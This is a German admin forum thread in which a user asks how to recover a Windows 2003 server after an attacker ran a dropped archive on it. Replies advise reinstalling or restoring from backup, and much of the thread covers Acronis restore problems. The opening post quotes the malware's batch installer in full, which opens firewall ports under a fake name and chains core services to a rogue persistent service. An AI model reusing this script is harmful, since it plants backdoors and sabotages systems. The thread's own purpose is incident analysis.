Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Hacker konnte Batch Ausführen

Frage Sicherheit Erkennung und -Abwehr

Mitglied: Thommy68

Thommy68 (Level 1) - Jetzt verbinden

22.06.2007, aktualisiert 21.07.2007, 5998 Aufrufe, 10 Kommentare

Hallo Gemeinde und Helferlein in der Not

Ich benötige Eure Hilfe
Aufgrund eines Konfigfehlers konnte ein Hacker eine Datei (Winrar.exe) per FTP Hochladen und danach Ausführen.
(Fehler wurde bereits gefixt und FW Ports geschlossen)

Aus dem Selbstextractarchiv und dem Virenscanner ergibt sich folgendes:
Virus: Bloodhound.Overpacked
4 Dateien:
rundll32.exe
rundll32.dll
auto.bat
winsock32.dll


In der Bat steht folgendes:

@echo off

REM || Scanning for Viruses ||

netsh firewall add portopening TCP 6666 "Windows Media Connect"
netsh firewall add portopening TCP 666 "Windows Media Connect"

REM || 10% Complete ||

::Install
cd \
cd %windir%
cd inf
mkdir sys
cd sys
rundll32.exe /i /h /s
sc config rundll32 error= ignore
sc failure rundll32 actions= restart/500 reset= 10
sc config lanmanserver depend= rundll32
sc config lanmanworkstation depend= rundll32
sc config LSASS depend= rundll32
sc config EventLog depend= rundll32
sc config "Windows Management Instrumentation" depend= rundll32
sc config IPSEC-services depend= rundll32
sc config EventSystem depend= rundll32
sc config Dnscache depend= rundll32
sc config Spooler depend= rundll32
sc config ProtectedStorage depend= rundll32

::Starten
net start rundll 32
net start rundll 32


REM || 80% Complete ||

REM || 100% Complete ||

del auto.bat
exit

Denn Angelegten Ordener "SYS" wurde bereits samt Inhalt gelöscht.
Jedoch hab ich jetzt noch Probleme mit den Event Viewer.
Es lässt sich weder der Dienst starten
--->>> Error 1075 : The dependency service does not exist or has been marked for deletion

noch die Logs öffnen.

--->>> Unable to complete the operation on "System".The interface is unknown
--->>> Unable to complete the operation on "Security".The interface is unknown
--->>> Unable to complete the operation on "Application".The interface is unknown
.
.
.


Kann mir jemand helfen und Verraten was das Ar......ch noch alles Verbogen hat
OS ist Win 2003 Server Web Edition

Gruß
Thommy
Mitglied: Dieter-56
23.06.2007 um 09:23 Uhr
hallo,

wenns möglich ist, würd' ich den server aus'm system rausnehmen und platt machen.
das erscheint mir noch als der geringste aufwand.
was da noch so alles passiert, ist überhaupt nicht abzusehen. evtl. ärgerst du dich da noch wochenlang mit rum.

also meine empfehlung: daten sichern, den server raus und neu gemacht, wenns machbar ist.
ist die schnellste variante mit dem geringsten aufwand.

dieter
Bitte warten ..
Mitglied: sysad
23.06.2007 um 10:07 Uhr
Kann mir jemand helfen und Verraten was das
Ar......ch noch alles Verbogen hat

Ist doch gut wenn hin und wieder jemand rein kommt, dann wird der Admin nicht größenwahnsinnig oder unvorsichtig und hat endlich mal wieder was richtiges zu tun....

Der Empfehlung meines Vorredners, alles platt zu machen und neu aufzusetzen, kann ich mich nur anschliessen. Ich gehe mal davon aus, dass Du keine vernünftige Datensicherung von vor der 'Injektion' hast? Sonst könntest Du die wieder restoren.
Bitte warten ..
Mitglied: DerSchorsch
23.06.2007 um 11:08 Uhr
Hallo,

Die Batch hat dafür gesorgt, dass der Ereignisprotokoll-Dienst (und noch mehrere andere auch) von dem Dienst "rundll32" abhängig sind. In der Batch sind dies die Zeilen sc config ... depend= rundll32
Diesen hast du jedoch gelöscht. Daher auch die Fehlermeldung "The dependency service does not exist..."

Bevor du jedoch auf die Idee kommst, einfach die Abhängigkeiten wieder zu löschen, empfehle ich dir das gleiche wie die anderen auch: Platt machen und neu aufsetzen bzw. Backup zurückspielen.
Denn auch wenn du die Modifikationen der Batch rückgängig machen kannst, weißt du nie, was der Angreifer zwischen dem Infizieren und der Entdeckung alles mit deinem System angestellt hast.

Gruß,
Schorsch
Bitte warten ..
Mitglied: Thommy68
23.06.2007 um 13:27 Uhr
Hallo Leute.
Zuerstmal Danke für Eure schnelle Hilfe, ihr seit Spitze.

Selbstverständlich habe ich ein Dayli Backup von der "C" Partition.
Allerdings hatte ich schonmal Probs bei der Widerherstellung.
Das Backup über Acronis ist nicht das Prolem, aber die Widerherstellung über Acronis Remote Console macht mit Kopfzerbrechen.

Und der Hoster verlangt jede Menge Teuros, wenn ein Techniker ran muss.
Ich habe keine Möglichkeit direkt am Server zu arbeiten, nur Remote.

Ich kann zwar über die Acronis die Remoteconsole Ausführen und auch das Image und die Zielpartition auswählen, aber nach dem Reboot passiert nichts mehr und der Server ist nichtmehr Erreichbar.

Ich weiß das Acronis nach dem Reboot seinen eigenen Loader startet, aber ob er auch beginnt das Image wiederherzustellen weiß ich nicht.

Evtl hat ja jemand schonmal mit der Remote Console von Acronis gearbeitet und kann mir sagen was da falsch läuft.

Die Platte ist nicht über Raid gespiegelt.
Partitions Image liegt auf D und soll C wieder ersetzen.

Thommy
Bitte warten ..
Mitglied: sysad
23.06.2007 um 14:04 Uhr
Hallo Leute.
Zuerstmal Danke für Eure schnelle
Hilfe, ihr seit Spitze.

Das hören wir doch immer gerne!


Selbstverständlich habe ich ein Dayli
Backup von der "C" Partition.
Allerdings hatte ich schonmal Probs bei der
Widerherstellung.

Deswegen soll ja ein Backup nicht nur zum Beschreiben sein, sondern im Ernstfalls muss man davon lesen können...

Das Backup über Acronis ist nicht das
Prolem, aber die Widerherstellung über
Acronis Remote Console macht mit
Kopfzerbrechen.

Das sollte man testen bevor alles im Eimer ist! Wenn der Server erst mal nicht mehr geht, sind Experimente über den richtigen Restore schwieriger.

Ich weiß das Acronis nach dem Reboot
seinen eigenen Loader startet, aber ob er
auch beginnt das Image wiederherzustellen
weiß ich nicht.

Wenn Du einen Restore mit Acronis machst, startet erst mal so eine Art abgesicherter Modus, in dem das alles zurückgespielt wird. Dann 'richtiger' Neustart und dann geht es wieder. Während des Restore hast Du keinen Zugriff.


Evtl hat ja jemand schonmal mit der Remote
Console von Acronis gearbeitet und kann mir
sagen was da falsch läuft.
Bitte warten ..
Mitglied: Thommy68
23.06.2007 um 18:32 Uhr
Leider funktioniert die Widerherstellung nicht, und ich weiß nicht warum.
Meine Augen reichen nicht soweit

Kann über Console das Image Auswählen , Zielpartition angeben und dann macht er nen Reboot.
Was dann passiert kann ich nicht sagen.

Jedenfalls ist der Server nach 2 Stunden immer noch Down.
Nach einem erneuten "Remote" Reboot läuft er wieder, jedoch immer noch mit dem alten Image.

Ich hoffe nicht das es auf einen Technikereinsatz vor Ort Rausläuft, der das Backup vor Ort Startet.

Gibt es evtl. noch irgendeinen Paremeter mit dem Acronis ohne Aufforderung das Backup lädt ??

Ich vermute nämlich, das das Backup wieder hergestellt wurde, jedoch die "Fertigmeldung" die ja jetzt am Lokalen Monitor zu sehen wäre nicht bestätigt werden kann.
Wenn ich jetzt Reboote, wäre es wie ein Abgebrochener Restore Auftrag.
Oder liege ich Falsch ??

Thommy
Bitte warten ..
Mitglied: gnarff
21.07.2007 um 01:26 Uhr

Ich vermute nämlich, das das Backup
wieder hergestellt wurde, jedoch die
"Fertigmeldung" die ja jetzt am
Lokalen Monitor zu sehen wäre nicht
bestätigt werden kann.
Das hoert sich ausnahmslos klasse an!
Man sollte doch meinen, das ein Server via Terminal-Emulator remotet wird und dass, obwohl keine Grafikausgabe [Desktop] zur Verfuegung steht, das zu wartende Betriebsystem Meldungen ausgibt.

In der Zeit, die Du mit Deinem Acronis-Dingsbums herumlaboriert hast, haettest Du den Server wenigstens zweimal neu aufsetzen koennen.

saludos
gnarff
Bitte warten ..
Mitglied: sysad
21.07.2007 um 08:20 Uhr
In der Zeit, die Du mit Deinem
Acronis-Dingsbums herumlaboriert hast,
haettest Du den Server wenigstens zweimal neu
aufsetzen koennen.

saludos
gnarff

Respekt, wenn jemand so schnell ist. Ich brauche für einen Server schon mal einen Tag, bevor alles gut läuft. Und ein Restore mit ATI dauert ca. 1h je nach Platte. Dann bist Du also mit 30 min ('wenigstens zweimal neu...') bei einem 10h Tag 20mal so schnell wie ich. Gratulation!
Bitte warten ..
Mitglied: gnarff
21.07.2007 um 16:04 Uhr
@ sysad
Das kommt davon, wenn man uebermuedet sich dazu entschliesst nochmal im Forum vorbeizuschaun. Habe mich einfach im Datum geirrt!
Ich hatte das erste Posting von Thommy gelesen, Datum 22.06.2007 und als ich seinen letzten Kommentar las, vom 23. 06. 2007, dachte ich: "Mensch, der sitzt da schon einen Monat dran!"; und hab entsprechend geantwortet.
Danke also, fuer den Hinweis!

Bei meiner Berechnung, wieviel Zeit man braucht, um einen einzelnen Server aufzusetzen, moechtest Du bitte in Deine Gedanken miteinbeziehen, dass ich keinen geregelten 8 oder 10 Stunden Arbeitstag habe, wie Du ihn wahrscheinlich hast.
Ich fange morgends um 5:00 an zu arbeiten und hoere nicht auf bis alles fertig ist -das kann dann schon mal tiefe Nacht oder frueher Morgen werden.

Ich habe 21 Stunden 45 Minuten gebraucht fuer ein DC, DB-Backup Server, File Server, 5 clients, Firewall, Router, Switch unter W2k3.
Ich weiss jetzt nicht, wo Du mich da tempomaessig ansiedelst, aber bestimmt nicht 20 mal schneller.

saludos
gnarff
Bitte warten ..
Mitglied: sysad
21.07.2007 um 22:45 Uhr
@ sysad

und hoere nicht auf bis alles fertig ist -das
kann dann schon mal tiefe Nacht oder frueher
Morgen werden.

So machen wir es doch alle, oder?


Ich habe 21 Stunden 45 Minuten gebraucht
fuer ein DC, DB-Backup Server, File Server, 5
clients, Firewall, Router, Switch unter
W2k3.

Nicht schlecht, das ist auch meine Zeit. Deswegen versuche ich auch immer, nicht neu aufzusetzen sondern irgendwie klonen oder so.

Ich weiss jetzt nicht, wo Du mich da
tempomaessig ansiedelst, aber bestimmt nicht
20 mal schneller.

Sollte auch nur ein Scherz wegen Deinem Hinweis sein.

saludos
gnarff

Auch saludos an alle Amigos
Bitte warten ..
Neuester Wissensbeitrag
Ähnliche Inhalte
Windows Server
Batch Script bei Start ausführen (3)

Frage von KEFHVDI zum Thema Windows Server ...

Batch & Shell
Batch-Variable nach Stichworten aus TXT Datei durchsuchen (3)

Frage von Markus5579 zum Thema Batch & Shell ...

Windows Server
gelöst Skript per GPO ausführen - Berechtigungen? (13)

Frage von honeybee zum Thema Windows Server ...

Heiß diskutierte Inhalte
Windows Userverwaltung
Ausgeschiedene Mitarbeiter im Unternehmen - was tun mit den AD Konten? (33)

Frage von patz223 zum Thema Windows Userverwaltung ...

LAN, WAN, Wireless
FritzBox, zwei Server, verschiedene Netze (21)

Frage von DavidGl zum Thema LAN, WAN, Wireless ...

Viren und Trojaner
Aufgepasst: Neue Ransomware Goldeneye verbreitet sich rasant (20)

Link von Penny.Cilin zum Thema Viren und Trojaner ...

Windows Netzwerk
Windows 10 RDP geht nicht (18)

Frage von Fiasko zum Thema Windows Netzwerk ...